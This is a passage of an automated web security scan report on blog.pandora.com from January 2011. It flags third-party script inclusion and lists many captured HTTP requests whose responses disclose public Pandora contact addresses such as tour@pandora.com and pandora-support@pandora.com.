If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/ HTTP/1.1 Host: blog.pandora.com Proxy-Connection: keep-alive Referer: http://blog.pandora.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.7.10.1294536123; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:23:45 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Fri, 07 Jan 2011 22:35:26 GMT ETag: "79e071-b926-499493c0d2780" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/html Content-Length: 47398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p> ...[SNIP]... <p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p> ...[SNIP]...
The following email address was disclosed in the response:
pandora-support@pandora.com
Request
GET /pandora/archives/2005/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:06:01 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:26:15 GMT ETag: "79e066-3a17-498819df317c0" Accept-Ranges: bytes Content-Length: 14871 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... month for all of us at Pandora has been the opportunity to interact with all of you. We want to have the same kind of relationship with all of our listeners. Please don't hesitate to send us an email (pandora-support@pandora.com) with your thoughts, feedback, ideas, and comments. We're still listening!</p> ...[SNIP]...
The following email address was disclosed in the response:
pandora-support@pandora.com
Request
GET /pandora/archives/2005/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:59 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:26:15 GMT ETag: "79e05f-4714-498819df317c0" Accept-Ranges: bytes Content-Length: 18196 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>Over the course of the last 8 weeks we've been introduced to an incredible group of Pandora listeners from all over the world. Whether it's been here in the Pandora blog comments, via pandora-support@pandora.com, or out there in the blogosphere we've virtually "met" an amazing and passionate group of music lovers.</p> ...[SNIP]...
The following email addresses were disclosed in the response:
pandora-support@pandora.com
tour@pandora.com
Request
GET /pandora/archives/2006/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:26:13 GMT ETag: "79e049-7adb-498819dd49340" Accept-Ranges: bytes Content-Length: 31451 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com">tour@pandora.com</a> ...[SNIP]... <p>Our use of existing namespaces is one area where I'm particularly interested in feedback during the beta period. Drop a note to pandora-support@pandora.com with "RSS Beta" in the subject line if you'd like to share your perspectives and feedback with us. I'm looking forward to talking with you about it. You are also invited to leave your comments here on ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2006/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Tue, 04 Jan 2011 19:54:13 GMT ETag: "79e0a4-16dfb-4990aa1f8c340" Accept-Ranges: bytes Content-Length: 93691 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>Please RSVP by sending an email to tour@pandora.com with DC in the subject line. Hope to see you there!</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2006/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:44 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Fri, 07 Jan 2011 22:22:10 GMT ETag: "79e06d-5e17-499490c9b2880" Accept-Ranges: bytes Content-Length: 24087 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]... <a href="mailto:tour@pandora.com ">tour@pandora.com </a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:26:01 GMT ETag: "7cc4d2-5f78-498819d1d7840" Accept-Ranges: bytes Content-Length: 24440 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with Las Vegas in the subject line.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:24 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:26:01 GMT ETag: "7cc519-72fa-498819d1d7840" Accept-Ranges: bytes Content-Length: 29434 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with CLEVELAND in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with BOSTON in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with AUSTIN in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SYRACUSE in the subject line.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:21 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Fri, 07 Jan 2011 22:22:17 GMT ETag: "7cc541-60d8-499490d05f840" Accept-Ranges: bytes Content-Length: 24792 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SANTA MONICA in the subject line.</p> ...[SNIP]...
The following email addresses were disclosed in the response:
beta-feedback@pandora.com
tour@pandora.com
Request
GET /pandora/archives/2008/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:20 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Fri, 07 Jan 2011 22:22:16 GMT ETag: "7cc52e-6d43-499490cf6b600" Accept-Ranges: bytes Content-Length: 27971 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with PALO ALTO in the subject line.</p> ...[SNIP]... <a href="mailto:beta-feedback@pandora.com">beta-feedback@pandora.com</a> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:19 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Fri, 07 Jan 2011 22:22:17 GMT ETag: "7cc1aa-75bc-499490d05f840" Accept-Ranges: bytes Content-Length: 30140 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with SONOMA in the subject line.</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2008/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT ETag: "7cc170-3e7e-498819ce06f40" Accept-Ranges: bytes Content-Length: 15998 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with DALLAS in the subject line.</p> ...[SNIP]...
The following email addresses were disclosed in the response:
event@pandora.com
tour@pandora.com
Request
GET /pandora/archives/2008/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT ETag: "7cc08c-6e61-498819ce06f40" Accept-Ranges: bytes Content-Length: 28257 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with PITTSBURGH in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "DES MOINES" in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "NEW YORK" in the subject line.</p> ...[SNIP]... </b> by sending an email to Angie at tour@pandora.com with "PHILADELPHIA" in the subject line.</p> ...[SNIP]... <p>Please RSVP by sending us an email to event@pandora.com with BBQ in the subject line. Make sure to let us know if you plan to bring a guest--more the merrier! Full details below: </p> ...[SNIP]...
The following email address was disclosed in the response:
event@pandora.com
Request
GET /pandora/archives/2008/10/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:25:57 GMT ETag: "7cc199-4a9d-498819ce06f40" Accept-Ranges: bytes Content-Length: 19101 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <b>Please RSVP to let us know you'll be there by sending an email to event@pandora.com with "APPLE STORE" in the subject line.</b> ...[SNIP]...
The following email address was disclosed in the response:
pandora-support@pandora.com
Request
GET /pandora/archives/2009/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:05:05 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:25:55 GMT ETag: "7cc203-710f-498819cc1eac0" Accept-Ranges: bytes Content-Length: 28943 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p>Here are the full release notes for 1.1. As usual, if you have any problems please feel free to leave a comment here or email our support team at pandora-support@pandora.com</p> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2010/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:04:06 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Wed, 29 Dec 2010 00:25:52 GMT ETag: "80c008-269f-498819c942400" Accept-Ranges: bytes Content-Length: 9887 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <p> We're having Pandora town-halls in Denver and Atlanta next week. If you're in one of those cities and haven't gotten your email invite, send a note to 'tour@pandora.com' and we'll put you on the list.</p> ...[SNIP]... you'll come and hang and chat for an hour and a bit, that's usually how long the town halls last. And if you're in another city and think it is time we had a town hall there, let us know by emailing 'tour@pandora.com,' and we'll add it to the list!</p> ...[SNIP]... </strong>: Send email to tour@pandora.com with number of guests<br /> ...[SNIP]... </strong> Send email to tour@pandora.com with number of guests<br /> ...[SNIP]...
The following email address was disclosed in the response:
tour@pandora.com
Request
GET /pandora/archives/2010/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:03:53 GMT Server: Apache/2.2.9 (Debian) Last-Modified: Fri, 07 Jan 2011 19:30:15 GMT ETag: "888013-3e68-49946a5c8bfc0" Accept-Ranges: bytes Content-Length: 15976 Vary: Accept-Encoding Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... een (any recommendations you have about cool places to stop and stretch legs or get a cup of coffee or a great meal between Grand Forks and Sioux Falls or Sioux Falls and Omaha, please let us know at tour@pandora.com). The response from the local audience has been wonderful, although no one has yet offered to make sure there's no snow...</p> ...[SNIP]... <p>So if you have friends you think might want to drop in, point them to the info below and ask them to email us at tour@pandora.com to RSVP. Not everyone on Pandora opts in to get emails so we always miss people that we wish we could reach. </p> ...[SNIP]...
The following email address was disclosed in the response:
pandora-support@pandora.com
Request
GET /pandora/archives/2010/11/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
